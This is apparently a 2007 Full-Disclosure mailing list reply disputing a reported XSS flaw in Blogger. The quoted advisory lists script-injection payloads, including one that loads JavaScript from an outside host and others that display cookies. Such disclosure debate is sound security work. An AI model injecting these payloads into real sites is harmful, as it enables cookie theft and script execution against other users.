Why is this a vulnerability? I can't see a way by which an attacker can insert JavaScript code into my blog.
> I've noticed that for any blog hosted at blogspot.com the cookie will > be not shown. The sensitive cookies are not maintained under blogspot.com, so allowing JavaScript in blogspot.com doesn't look like a threat or vulnerability. > Otherwise, if the blog is located inside your web site, the cookie > will be shown. But I am the only one who is inserting the JavaScript in my blog. So, I'll end up stealing the cookies set for my domain. Why would I steal cookies set for my domain? I already know them because it is my website. Regards, Susam Pal http://susam.in/ Daniele Costa wrote, On Saturday 11 August 2007 10:52 PM: > ------------------------------------------------------ > BLOGGER XSS VULNERABILITY > ------------------------------------------------------ > > Blogspot.com > > Homepage: http://www.blogspot.com > > and > > Blogger.com > > Homepage: http://www.blogger.com > > Affected files: > > Post's Input boxes > > ------------------------------------------------------ > XSS DETAILS > ------------------------------------------------------ > XSS vuln via injecting javascript code into any post. > > Blogger doesn't sanitize user input during post process. > Try injecting the following code into a post > > <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> > > or just the well known > > <SCRIPT>alert(document.cookie);</SCRIPT> > > or > > <SCRIPT >alert(document.domain);</SCRIPT> > <!-- COPIED IN REPLY --> > > ------------------------------------------------------ > Proof Of Concept > ------------------------------------------------------ > > http://pocasiculezza.blogspot.com/ > > ----------------------------------------------------- > HISTORY > ------------------------------------------------------ > Discovered : 07/11/2007 by Daniele Costa > Published : 07/11/2007 by Daniele Costa > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/